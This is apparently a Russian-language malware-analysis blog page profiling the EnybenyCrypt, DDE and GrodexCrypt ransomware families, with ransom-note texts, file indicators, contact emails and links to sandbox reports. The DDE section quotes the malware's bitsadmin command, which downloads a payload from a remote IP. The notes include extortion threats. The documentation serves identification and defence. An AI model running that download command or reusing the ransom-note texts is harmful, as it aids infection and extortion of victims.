Если вы не видите здесь изображений, то используйте VPN.
Показанные сообщения отсортированы по дате запроса (Crypt888). Сортировать по релевантности Показать все сообщения
Показанные сообщения отсортированы по дате запроса (Crypt888). Сортировать по релевантности Показать все сообщения

понедельник, 29 октября 2018 г.

EnybenyCrypt

EnybenyCrypt Ransomware

(шифровальщик-вымогатель)
 Translation into English


Этот крипто-вымогатель шифрует данные пользователей с помощью AES-256, а затем требует выкуп в # BTC, чтобы вернуть файлы. Оригинальное название. На файле написано: EnybenyCrypt.exe или что попало. Среда разработки: Visual Studio 2010.

 © Генеалогия: HiddenTear >>  Scrabber, EnybenyCrypt, SnowPicnic, SymmyWare

К зашифрованным файлам добавляется расширение: .crypt888


 Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 
История версий: EnybenyCrypt > EnyBenyRevenge > EnyBenyHorsuke

 Активность этого крипто-вымогателя пришлась на конец октября 2018 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

 Записка с требованием выкупа называется: Hack.html

Содержание записки о выкупе:
Your files was encrypted with AES-256 Millitary Grade Encryption 
Contact to rsupp@protonmail.ch or im flush your files to toilet and fuck using my dick!

 Перевод записки на русский язык:
Ваши файлы были зашифрованы с помощью шифрования военного класса AES-256
Контакт по rupp@protonmail.ch или я смою ваши файлы в туалет и ***!

Технические детали

По сообщениям разработчика: никогда не распространялся через RDP. 
Возможно, что в будущем может начать распространяться другими способами: с помощью фальшивых обновлений, перепакованных и заражённых инсталляторов, email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, веб-инжектов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

 Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1
Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
EnybenyCrypt.exe
EnybenyCrypt.pdb - оригинальное название проекта
Hack.html
<random>.exe - случайное название
1234.jpg -> Hack.jpg

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->
xxxx://fairybreathes.6te.net/1234.jpg
%USERPROFILE%\Documents\Visual Studio 2010\Projects\EnybenyCrypt\EnybenyCrypt\obj\x86\Release\EnybenyCrypt.pdb

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

 Сетевые подключения и связи:
URL: 

Email: rupp@protonmail.ch
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

 Результаты анализов:
Hybrid анализ >>
𝚺  VirusTotal анализ >>
🐞 Intezer анализ >>
Ⓥ VirusBay образец >>
ⴵ  VMRay анализ >>
ᕒ  ANY.RUN анализ >>
👽 AlienVault анализ >>
🔃 CAPE Sandbox анализ >>
⨇ MalShare анализ >>
⟲ JOE Sandbox анализ >>
Степень распространённости: низкая.
Подробные сведения собираются регулярно.


=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

 Scrabber Ransomware
EnybenyCrypt Ransomware > EnyBenyRevenge > EnyBenyHorsuke
SnowPicnic Ransomware
SymmyWare Ransomware
и другие

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===
Обновление от 30 октября 2018:
Записка: Hack.html
Расширение: .suckmydick
➤ Содержание записки:
All your files have been encrypted with AES-256
You are not decrypt files before buy decryptor. Price: 0 bitcoins
Contact us: decryptscrabber@mail.ru
If you not buy - im flush your data TO TOILET!!!!!! 
➤ Другой текст:
All your files have been encrypted with AES-256 Strong Encryption
You are not decrypt files before buy decryptor. Price: 0 bitcoins
Contact us: decryptscrabber@mail.ru (Please not abuse)
If you not buy - im flush your data TO TOILET!!!!!! + Your backups to normal windows deleted and YOUR BIOS PATCHED = System encrypted newerj
➤ Еще текст:
GREAT! CONGRULATIONS! YOU HAVE INSTALLED A DANGER RANSOMWARE IN WORLD (NOT) AND VIRUS WILL BE ENCRYPTING YOU DATA

➤ URLs: 
URL-1: fairybreathes.6te.net 
URL-2: e.freewebhostingarea.com
URL note: xxxx://fairybreathes.6te.net/1234.jpg

Email: scrabber@mail.ru
Результаты анализов: HA + HA + VT + IA

Обновление от 16 ноября 2018:
Пост в Твиттере >>
🎥 Видеобзор от CyberSecurity GrujaRS >>
Расширение: .EnyBenied
Самоназвание: ENYBENY REVENGE
Записка: ENYBENY.TXT + картинка ENYBENY.png
Email: filekerk@tutanota.com, yougame@protonmail.ch
Специальный файл: UniqueKEYForUser.EnyBenied.Information
Вместо слова User будет имя пользователя ПК. 


Файл EXE: Cerber Ransomware Sourse.exe
Результаты анализов: VT + VMRay

➤ Содержание записки:
#######ENYBENY REVENGE#######
Great! You a member #Enybeny community, and all files have been encrypted!
Encryption - reversible modification,
created for protect all your files
You can buy decryptor - price 0.00000001 BTC
For decrypt contact with:
filekerk@tutanota.com
OR
yougame@protonmail.ch
Free decryption as guarantee (1 file, size not 1 mb)
And for free(or not) decryption please send file: UniqueKEYForUser.EnyBenied.Information
Please not delete this note!
Good luck.
And please check My Computer menu
#######ENYBENY REVENGE#######
P.S If you deletes all copies of key, after mailing ticket to Free (or not free) decryption,
(set text or subject:------BEGIN ENYBENY KEY-------7438383d7633XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX554a41.......END ENYBENY KEY
Обновление от 17 ноября 2018:
Пост в Твиттере >>
🎥 Видеобзор от CyberSecurity GrujaRS >>
Расширение: .Horsuke
Самоназвание: ENYBENY HORSUKE
Записки: Hack.TXT - текстовый файл
Hack.png - картинка 
Hack.vbs - файл скрипта для запуска голосового сообщения
Email: swordofsakura@india.com, krupalupium@india.com
Специальный файл: UniqueKEYForUser.Horsuke.Information
Вместо слова Administrator будет имя пользователя ПК. 
Файл EXE: Tron.exe 
Результаты анализов: VT + HA + IA + ARVMRay



➤ Содержание записки:
#######ENYBENY HORSUKE#######
Great! You a member #Enybeny community, and all files have been encrypted!
Encryption - reversible modification,
created for protect all your files
You can buy decryptor - price 0.00000001 BTC
For decrypt contact with:
swordofsakura@india.com
OR
krupalupium@india.com
Free decryption as guarantee (1 file, size not 1 mb)
And for free(or not) decryption please send file: UniqueKEYForUser.Horsuke.Information
Please not delete this note!
Good luck.
And please check My Computer menu
#######ENYBENY HORSUKE#######
P.S If you deletes all copies of key, create file \UniqueKEYForUser.Horsuke.Information contains: 
------BEGIN ENYBENY KEY-------
4775696e536343584f463849766d4d722f6966373254713d3572783d37434f63202d2061646d696e202d205043
-------END ENYBENY KEY------

➤ Содержание VBS-записки:
Set SAPI = CreateObject("SAPI.SpVoice")
SAPI.Speak "Attention! Atention! Attention"
For i = 1 to 5
SAPI.Speak "If you hear this and you most likely saw your files with the new extension .bomber, so all your photos, music, documents, and databases were encrypted to AES 256 bit. Welcome to Enybeny Bomber."
Next
Перевод VBS-записки на русский язык:
Внимание! ВНИМАНИЕ! Внимание
Если вы это слышите, и вы, скорее всего, видели ваши файлы с новым расширением .bomber, поэтому все ваши фотографии, музыка, документы и базы данных были зашифрованы до 256 бит AES. Добро пожаловать в Enybeny Bomber.
Примечательно, что VBS-записка предназначалась для другой версии EnybenyBomber, или разработчик в последний момент передумал и назвал версию EnyBenyHorsuke
Обновление от 17 ноября 2018:
Пост в Твиттере >>
🎥 Видеообзор >>
Самоназвание: EnyBeny Nuclear Ransomware (Wiper)
На файле написано: malwurhanrurtim
Файл проекта: malwurhanrurtim.pdb
Расширение не добавляется из-за ошибки с ":"
Расширение должно было быть: .PERSONAL_ID:<random>.Nuclear

Записки: Hack.TXT - текстовый файл
Hack.png - картинка 
Специальный файл: UniqueKEYForUser.Nuclear.Information
Email: brianmaps@gmail.com, amigo_a@india.com 
➤ Список файловых расширений: .7z, .asp, .aspx, .avi, .bc6, .bc7, .bkf, .bkp, .cas, .csv, .d3dbsp, .doc, .docx, .fos, .gdb, .gho, .hkdb, .hplg, .html, .hvpl, .ibank, .icxs, .itdb, .itl, .itm, .m4a, .map, .mdb, .mdbackup, .mddata, .mov, .mp4, .odt, .php, .pkpass, .png, .ppt, .pptx, .psd, .qdf, .qic, .rar, .sb, .sidd, .sidn, .sie, .sis, .sql, .sum, .svg, .syncdb, .t12, .t13, .tax, .txt, .vdf, .wma, .wmo, .wmv, .wotreplay, .xls, .xlsx, .xml, .zip, .ztmp (65 расширений).
Файл: malwurhanrurtim.exe
Результаты анализов: VT + HA + IA 

➤ Содержание записки: 
#######ENYBENY NUCLEAR#######
Great! You a member #Enybeny community, mutating completed and all your files has been encrypted!!
Encryption - reversible modification,
created for protect all your files
You can buy decryptor - price 0.00000001 BTC (No decryption, lol! Emails not registred!)
For decrypt contact with:
brianmaps@gmail.com 
OR 
amigo_a@india.com 
Free decryption as guarantee (1 file, size not 1 mb)
And for free(or not) decryption please send file: UniqueKEYForUser.Nuclear.Information
Please not delete this note!
Good luck.
#######ENYBENY NUCLEAR#######
P.S If you deletes all copies of key, create file




Обновление от 3 ноября 2018:
Самоназвание: EnyBenyCristmas
Расширение: .personal.5RGR0X38VJHLELB.Cristmas@india_com
Шаблон расширения: .personal.<PC_name>.Cristmas@india_com
Записка: Hack.TXT
На файле написано: malwurhanrurtim
Файл проекта: malwurhanrurtim.pdb
Специальный файл: UniqueKEYForadmin.personal.5RGR0X38VJHLELB.Cristmas@india_com.info
Email: desktopmain228@india.com, care_nlm@tutamail.cc
Файл EXE: malwurhanrurtim.exe
Результаты анализов: VT + HA + IA + AR
➤ Содержание записки:
--*--*--*--|EnyBeny CRISTMAS|--*--*--*--
Great! You a member 2019 New year #Enybeny community
Encryption algorytm - AES-128 with unique 32 symbols, virus
created for protect all your files
You can buy decryptor - price 0.00000001 BTC
For decrypt contact with:
     desktopman228@india.com     
     OR     
     care_nlm@tutamail.cc     
Free decryption as guarantee (1 file, size not 1 mb)
And for free(or not) decryption please send file: UniqueKEYForadmin.personal.5RGR0X38VJHLELB.Cristmas@india_com.info
Please not delete this note!
Good luck.
--*--*--*--|EnyBeny CRISTMAS|--*--*--*--
P.S If you deletes all copies of key, create file UniqueKEYForadmin.personal.5RGR0X38VJHLELB.Cristmas@india_com.info contains: 
------BEGIN ENYBENY KEY-------
38496e495e56352652737077697863706550784a6a32724e4e5e73494b596756202d2061646d696e202d20555345522d5043
-------END ENYBENY KEY------
Your personal id: 5RGR0X38VJHLELB




=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===
 Read to links: 
 Tweet on Twitter + myTweet 
 ID Ransomware (ID as HiddenTear)
 Write-up, Topic of Support
🎥  Video review >>
 - Видеообзор от CyberSecurity GrujaRS
 Thanks: 
 CyberSecurity GrujaRS
 Andrew Ivanov
 *
 *

© Amigo-A (Andrew Ivanov): All blog articles.

Автор: на 13 комментариев:

среда, 25 июля 2018 г.

DDE

DDE Ransomware

(шифровальщик-вымогатель)
 Translation into English


Этот крипто-вымогатель шифрует данные пользователей, а затем предлагает заплатить выкуп и связаться по email, чтобы вернуть файлы. Также сообщается, что ключ дешифрования можно найти самому. Оригинальное название: DDE Ransomware. На файле написано: dde_ransomware.exe.

 © Генеалогия: Crypt888 и другие >> DDE 

 К зашифрованным файлам добавляется расширение: .encrypted
Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 
Активность этого крипто-вымогателя пришлась на вторую половину июля 2018 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Запиской с требованием выкупа выступает изображение, заменяющее обои Рабочего стола и маленькое диалоговое окно, в котором предлагается самостоятельно найти ключ дешифрования.

Содержание текста о выкупе:
YOU ARE HACKED
ALL YOUR PERSONAL FILES HAVE BEEN ENCRYPTED!
IF YOU WANT RESTORE YOUR DATA YOU HAVE TO PAY!
CONTACT US: no-reply@gmail.com
BUT! YOU CAN RESTORE YOUR DATA WITHOUT
OUR DECRYPTOR! :)))))

Перевод текста на русский язык:
ВЫ ВЗЛОМАНЫ
ВСЕ ВАШИ ЛИЧНЫЕ ФАЙЛЫ БЫЛИ ЗАШИФРОВАНЫ!
ЕСЛИ ВЫ ХОТИТЕ ВОССТАНОВИТЬ СВОИ ДАННЫЕ, ВАМ ПРИДЕТСЯ ПЛАТИТЬ!
СВЯЖИТЕСЬ С НАМИ: no-reply@gmail.com
НО! ВЫ МОЖЕТЕ ВОССТАНОВИТЬ СВОИ ДАННЫЕ БЕЗ
НАШ ДЕШИФРАТОРА! :)))))

Содержание текста из окна с заголовком HACKER:
Your important files are encrypted.
If you need them, You can find my KEY to decrypt.
GOOD LUCK!!!

 Перевод текста на русский язык:
Ваши важные файлы зашифрованы.
Если они вам нужны, вы можете найти мой ключ для расшифровки.
УДАЧИ!!!

Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

 Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1
➤ DDE использует BITS (службу фоновой интеллектуальной передачи данных Windows, Background Intelligent Transfer Service) для загрузки вредоносов на ПК и установки изображения на обои с помощью команд:
cmd.exe /c bitsadmin /transfer CR /priority foreground http://203.162.130.73/a.zip %ALLUSERSPROFILE%\img.jpg > %TEMP%\a.txt
bitsadmin.exe bitsadmin /transfer CR /priority foreground http://203.162.130.73/a.zip %ALLUSERSPROFILE%\img.jpg

 Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
dde_ransomware.exe
bitsadmin.exe
img.jpg
a.zip
a.txt
<random>.exe - случайное название

 Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->
%TEMP%\a.txt
%ALLUSERSPROFILE%\img.jpg

 Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

 Сетевые подключения и связи:
xxxx://203.162.130.73/a.zip
xxxx://192.168.56.152:2869/upnphost/udhisapi.dll?content=uuid:4f8e1a2d-3fec-4a15-86de-6f8fafe83a56
xxxx://[fe80::c8c7:a44f:142b:cf30]:2869/upnphost/udhisapi.dll?content=uuid:4f8e1a2d-3fec-4a15-86de-6f8fafe83a56
См. ниже результаты анализов.

 Результаты анализов:
Hybrid анализ >>
𝚺  VirusTotal анализ >>
🐞 Intezer анализ >>
Ⓥ VirusBay образец >>
ⴵ  VMRay анализ >>
ᕒ  ANY.RUN анализ >>
👽 AlienVault анализ >>
🔃 CAPE Sandbox анализ >>
⨇ MalShare анализ >>
⟲ JOE Sandbox анализ >>

Степень распространённости: низкая.
Подробные сведения собираются регулярно.


=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===
=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===
=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===
 Read to links: 
 Tweet on Twitter + Tweet 
 ID Ransomware (ID as )
 Write-up, Topic of Support
 * 
 Thanks: 
 CyberSecurity GrujaRS
 Andrew Ivanov
 *
 *

© Amigo-A (Andrew Ivanov): All blog articles.

Автор: на Комментариев нет:

вторник, 30 мая 2017 г.

GrodexCrypt

GrodexCrypt Ransomware

(шифровальщик-вымогатель)


Этот крипто-вымогатель шифрует данные пользователей с помощью AES, а затем требует выкуп в $50 в BTC, чтобы вернуть файлы. Оригинальное название: GrodexCrypt. На файле написано: windir.exe.
шифровальщик вирус-шифровальщик троян-шифровальщик крипто-вымогатель удалить восстановить файлы расшифровка расшифровать дешифровать дешифрование дешифровка алгоритм crypto-ransomware virus-encoder key ransom decrypt decryption recovery remove restore decode files data public private

 © Генеалогия: MicroCop (Crypt888) > GrodexCrypt

К зашифрованным файлам, как в прошлогоднем MicroCop, добавляется не расширение, а приставка Lock. — таким образом зашифрованный файл тоже выглядит так: Lock.original_name.png

Активность этого крипто-вымогателя пришлась на начало июня 2017 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Запиской с требованием выкупа выступает экран блокировки:
 

Содержание записки о выкупе и FAQ:
1. 
Your computer files have been encrypted. Your photos, videos, documents, etc....
But, don't worry! You can still save your files.
You have 48 hours to pay 50 USD in Bitcoins to get the decryption key.
After 48 all the files will be deleted and the decryption key will be destroyed.
If you do not have bitcoins Google the website buybitcoinworldwide or localbitcoins
Purchase 50 American Dollars worth of Bitcoins.
Send to the Bitcoins address specified.
Within minutes of receiving your payment your computer will receive the decryption application and return to normal.
Try anything funny and the decryption key will be destroyed along with your whole computer.
As soon as you have paid, please send email to STYSLA@PROTONMAIL.COM with your unique code: "7C8" as we receive the email we will send you the decryption application.
https://www.buybitcoinworldwide.com/

 2. 
Q: Is it possible to decrypt my files without paying?
A: No
Q: What if I try to remove this software?
A: Your decryption application will be destroyed and all of your files will be deleted
Q: What if I dont have bitcoins?
A: We have clear instructions how to buy bitcoins and send them to us.
Перевод записки и FAQ на русский язык:
1. 
Твои компьютерные файлы были зашифрованы. Твои фотографии, видео, документы и т.д....
Но, не волнуйся! Ты можешь сохранить свои файлы.
У тебя есть 48 часов, чтобы заплатить $50 в биткоинах и получить ключ дешифрования.
После 48 все файлы будут удалены, а ключ дешифрования будет уничтожен.
Если у тебя нет биткоинов гугли на сайте buybitcoinworldwide или localbitcoins
Купи 50 долларов за биткоины.
Отправь на биткоин-адрес.
Через несколько минут после получения платежа ваш компьютер получит приложение для расшифровки и вернется в нормальное состояние.
Попробуешь пошутить и ключ дешифрования будет уничтожен вместе с твоим компьютером.
Как только ты заплатишь, отправь email на STYSLA@PROTONMAIL.COM со своим уникальным кодом: "7C8", когда мы получим email, мы пошлем тебе приложение дешифрования.

 2.
Вопрос: Можно ли расшифровать мои файлы без оплаты?
Ответ: Нет
В.: Что будет, если я пытаюсь удалить эту программу?
О.: Твое приложение для дешифрования будет уничтожено и все твои файлы будут удалены.
В.: Что, если у меня нет биткоинов?
О.: У нас есть четкие инструкции, как купить биткойны и отправить их нам.

 Распространяется путём взлом через незащищенную конфигурацию RDP или может распространяться с помощью email-спама и вредоносных вложений, обманных загрузок, эксплойтов, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

 Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
windir.exe

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

 Сетевые подключения и связи:
STYSLA@PROTONMAIL.COM
См. ниже результаты анализов.

 Результаты анализов:
Гибридный анализ >>
VirusTotal анализ >>
Другой анализ >>

 Степень распространённости: низкая.
Подробные сведения собираются регулярно.

 
Внимание!
Для зашифрованных файлов есть декриптер
Скачать Crypt888Decrypter для дешифровки >>
Описание для Crypt888 >>
Декриптер общий для Crypt888 и GrodexCrypt.
Это просто разные версии одного и того крипто-вымогателя. 
 Read to links: 
 Tweet on Twitter
 ID Ransomware
 Write-up, Write-up by Avast
 * 
 Thanks: 
 Jakub Kroustek
 Lawrence Abrams
 *
 *

© Amigo-A (Andrew Ivanov): All blog articles.

ВНИМАНИЕ!
1) Ваши комментарии после статьи появятся только после проверки. Дублировать их не нужно.
2) В своём сообщение в форме обратной связи обязательно укажите название шифровальщика.
Автор: на Комментариев нет:
Подписаться на: Сообщения (Atom)

Постоянные читатели

My tweet feed

My tweet feed
Follow me!

My profile on BC

My profile on BC
Follow me!

Форма для связи / Contact

Имя

Электронная почта *

Сообщение *